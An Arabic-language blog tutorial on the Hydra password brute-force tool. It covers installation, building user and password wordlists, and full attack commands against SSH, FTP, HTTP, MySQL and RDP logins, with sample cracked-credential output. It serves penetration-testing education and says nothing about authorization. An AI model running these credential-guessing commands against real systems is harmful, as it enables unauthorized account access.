Blog Wallpaper
A
ALI ALAKABRالسبت، 28 يونيو 2025

Hydra

أداة Hydra هي أداة قوية لتجربة تخمين كلمات المرور (Brute Force) على خدمات تسجيل الدخول مثل SSH، FTP، HTTP، وغيرها.

منذ شهرين تقريبا

Area Iconالأمن السيبراني - إختبار الإختراق9.5 النسخة

شنو هي Hydra؟

هي أداة مفتوحة المصدر مختصة باختبار كلمات المرور باستخدام طرق Brute-Force أو Dictionary Attack، وتستخدم ضد بروتوكولات وخدمات مختلفة مثل:

  • HTTP / HTTPS
  • FTP
  • SSH
  • Telnet
  • SMTP
  • MySQL
  • RDP
  • وغيرها هواية...

يعني باختصار: إذا عندك Service بيها تسجيل دخول، تكدر تستعمل Hydra تجرب آلاف كلمات المرور بطريقة آلية لحد ما تحصل Valid Creds.

طريقة التثبيت:

غالبًا تكون مثبتة مسبقًا على توزيعة Kali Linux. بس إذا مو موجودة:

على Kali أو Debian/Ubuntu:

sudo apt update
sudo apt install hydra -y

تتأكد من التثبيت :

hydra -h
تشغيل الأداة
تشغيل الأداة

طريقة الاستخدام:

نحاول نخلي Hydra تجرب Login على سيرفر SSH:

1. نجهز لستة الـUsers:

nano users.txt

مثلاً نكتب:

root
admin
user

2. نجهز لستة كلمات المرور:

nano passwords.txt

مثلاً نكتب:

123456
password
admin123

او تكدر تستعمل لستات جاهزة من أي مصدر مثلاً من Github

3. نشغل الأداة:

hydra -L users.txt -P passwords.txt ssh://192.168.1.100
  • -L لستة المستخدمين.
  • -P قائمة الباسوردات.
  • ssh://IP هو البروتوكول + الآي بي الخاص بالجهاز الهدف.

النتيجة:

إذا وحدة من الـCreds صحيحة، راح تطبعلك:

[22][ssh] host: 192.168.1.100   login: admin   password: admin123

استخدامات ثانية:

البروتوكولالأمر
FTPhydra -L users.txt -P pass.txt ftp://target
HTTP Basic Authhydra -L users.txt -P pass.txt http://target/
MySQLhydra -L users.txt -P pass.txt mysql://target
RDPhydra -L users.txt -P pass.txt rdp://target

بعض الـOptions المهمة:

  • -t: تحدد عدد الثريد (العمليات المتزامنة). مثلًا -t 4
  • -V: يطبع المحاولات وحدة وحدة يعني ينطيك تفاصيل
  • -f: يتوقف أول ما يحصل البيانات الصحيحة
  • -o: يحفظ النتائج بملف

مثال :

hydra -L users.txt -P passwords.txt -t 6 -V -f ssh://192.168.1.100 -o result.txt
سوبرسايبر | Hydra